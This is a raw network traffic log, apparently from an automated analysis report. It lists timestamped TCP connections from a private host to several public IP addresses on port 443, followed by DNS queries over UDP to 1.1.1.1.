                                                                                                                                                                                                                                                Oct 3, 2024 16:09:31.424396992 CEST44349751104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:31.424493074 CEST49751443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:31.471410036 CEST44349751104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:31.648420095 CEST44349751104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:31.648499966 CEST44349751104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:31.648578882 CEST49751443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:31.880856991 CEST49751443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:31.880949974 CEST44349751104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.262368917 CEST49752443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.262413025 CEST44349752104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.262511969 CEST49752443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.262794971 CEST49752443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.262809038 CEST44349752104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.351370096 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.351439953 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.351506948 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.351826906 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.351855040 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.724250078 CEST44349752104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.724857092 CEST49752443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.724883080 CEST44349752104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.725169897 CEST44349752104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.725584984 CEST49752443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.725584984 CEST49752443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.725651979 CEST44349752104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.808640003 CEST49752443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.816646099 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.816986084 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.817039013 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.817358971 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.817643881 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.817712069 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.817773104 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.817858934 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.817888975 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.817989111 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.818018913 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.872987032 CEST44349752104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.873059034 CEST44349752104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.873128891 CEST49752443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.873836994 CEST49752443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:32.873855114 CEST44349752104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.300867081 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.300918102 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.300945997 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.300976992 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301002979 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301038027 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301038027 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301125050 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301193953 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301240921 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301292896 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301326990 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301353931 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301378012 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301446915 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301446915 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301515102 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.301573038 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.305524111 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.305562973 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.305628061 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.305644989 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306060076 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306113958 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306128025 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306170940 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306219101 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306232929 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306291103 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306339979 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306353092 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306408882 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306456089 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306583881 CEST49753443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.306617022 CEST44349753104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.324163914 CEST49754443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.324263096 CEST44349754104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.324378014 CEST49754443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.325006962 CEST49754443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.325045109 CEST44349754104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.799052954 CEST44349754104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.799571037 CEST49754443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.799644947 CEST44349754104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.799995899 CEST44349754104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.800426006 CEST49754443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.800498009 CEST44349754104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.800582886 CEST49754443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.847399950 CEST44349754104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.949836969 CEST44349754104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.949930906 CEST44349754104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.950145006 CEST49754443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.950831890 CEST49754443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:33.950881004 CEST44349754104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:35.291003942 CEST44349728142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:35.291165113 CEST44349728142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:35.291266918 CEST49728443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:36.699839115 CEST49728443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:36.699879885 CEST44349728142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:53.482675076 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:53.482773066 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:53.482911110 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:53.483293056 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:53.483326912 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.090748072 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.090876102 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.092597008 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.092618942 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.092999935 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.100831985 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.147411108 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.306531906 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.306564093 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.306647062 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.306665897 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.306741953 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.306777954 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.306799889 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.307601929 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.307689905 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.307701111 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.307722092 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.307751894 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.308016062 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.308075905 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.310551882 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.310551882 CEST49755443192.168.2.620.12.23.50
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.310589075 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:54.310611010 CEST4434975520.12.23.50192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.622210979 CEST49757443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.622282982 CEST4434975735.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.622350931 CEST49757443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.622559071 CEST49757443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.622579098 CEST4434975735.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.629395008 CEST49758443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.629414082 CEST4434975835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.629473925 CEST49758443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.629626036 CEST49758443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:21.629643917 CEST4434975835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.086692095 CEST4434975735.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.087096930 CEST49757443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.087125063 CEST4434975735.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.088077068 CEST4434975735.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.088356972 CEST49757443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.088454008 CEST4434975735.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.088470936 CEST49757443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.089307070 CEST4434975835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.089658022 CEST49758443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.089668989 CEST4434975835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.091183901 CEST4434975835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.091245890 CEST49758443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.091522932 CEST49758443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.091620922 CEST4434975835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.091790915 CEST49758443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.091804028 CEST4434975835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.135413885 CEST4434975735.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.136215925 CEST49758443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.138675928 CEST49757443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.223947048 CEST4434975835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.224025965 CEST4434975835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.224159002 CEST49758443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.224436045 CEST49758443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.224467039 CEST4434975835.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.225042105 CEST49759443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.225138903 CEST4434975935.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.225224972 CEST49759443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.225413084 CEST49759443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.225440025 CEST4434975935.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.227469921 CEST4434975735.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.227590084 CEST4434975735.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.227653027 CEST49757443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.227653027 CEST49757443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.228092909 CEST49757443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.228101015 CEST49760443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.228126049 CEST4434976035.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.228188992 CEST49760443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.228406906 CEST49760443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.228432894 CEST4434976035.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.687818050 CEST4434976035.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.688096046 CEST49760443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.688174963 CEST4434976035.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.689837933 CEST4434976035.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.690181971 CEST49760443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.690311909 CEST49760443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.690324068 CEST4434976035.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.690371037 CEST4434976035.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.693969011 CEST4434975935.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.694174051 CEST49759443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.694188118 CEST4434975935.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.694664001 CEST4434975935.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.694942951 CEST49759443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.695025921 CEST4434975935.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.695058107 CEST49759443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.729967117 CEST49760443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.739402056 CEST4434975935.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.745712996 CEST49759443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.846096039 CEST4434976035.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.846555948 CEST49760443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.846632957 CEST4434976035.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.846699953 CEST49760443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.852523088 CEST4434975935.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.852677107 CEST49759443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.852726936 CEST4434975935.190.80.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:22.852782965 CEST49759443192.168.2.635.190.80.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:24.716377020 CEST49761443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:24.716453075 CEST44349761142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:24.716563940 CEST49761443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:24.716825008 CEST49761443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:24.716842890 CEST44349761142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:25.367300034 CEST44349761142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:25.367636919 CEST49761443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:25.367686987 CEST44349761142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:25.368356943 CEST44349761142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:25.368654966 CEST49761443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:25.368745089 CEST44349761142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:25.417809963 CEST49761443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:35.297534943 CEST44349761142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:35.297605991 CEST44349761142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:35.297710896 CEST49761443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:36.686574936 CEST49761443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:10:36.686645031 CEST44349761142.250.186.164192.168.2.6

                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.280761957 CEST5005053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.290560007 CEST53500501.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.295245886 CEST6323053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.305035114 CEST53632301.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.308396101 CEST6242453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.317995071 CEST53624241.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.319366932 CEST4944653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.329556942 CEST53494461.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.330985069 CEST5987453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.340147018 CEST53598741.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.341243029 CEST5155153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.350275993 CEST53515511.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.352942944 CEST5930153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.362502098 CEST53593011.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.363755941 CEST5984653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.373507977 CEST53598461.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.375637054 CEST5916353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.385386944 CEST53591631.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.386789083 CEST5880053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:17.396269083 CEST53588001.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.726466894 CEST5941053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:18.739311934 CEST53594101.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.240343094 CEST5093753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.240695953 CEST5965353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.246300936 CEST53602131.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.249231100 CEST53600631.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.249994040 CEST53509371.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:20.250003099 CEST53596531.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.598800898 CEST53537201.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.619370937 CEST6319853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.620413065 CEST5822353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.626241922 CEST53631981.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:21.627939939 CEST53582231.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.176002026 CEST5339153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.176155090 CEST5727553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.183535099 CEST53533911.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.184418917 CEST53572751.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.198301077 CEST6441053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.198613882 CEST5784353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.206382036 CEST53644101.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.208780050 CEST53578431.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.653476954 CEST5641353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.653631926 CEST6057453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.660455942 CEST53564131.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.660506010 CEST53605741.1.1.1192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.876797915 CEST6003453192.168.2.61.1.1.1
